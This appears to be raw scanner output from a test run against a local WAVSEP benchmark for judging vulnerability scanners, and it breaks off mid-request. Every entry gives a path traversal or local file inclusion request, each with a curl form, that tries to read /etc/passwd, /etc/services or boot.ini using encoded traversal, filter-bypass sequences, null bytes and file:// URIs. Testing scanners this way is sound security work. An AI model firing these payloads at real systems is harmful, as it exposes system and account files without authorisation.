GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
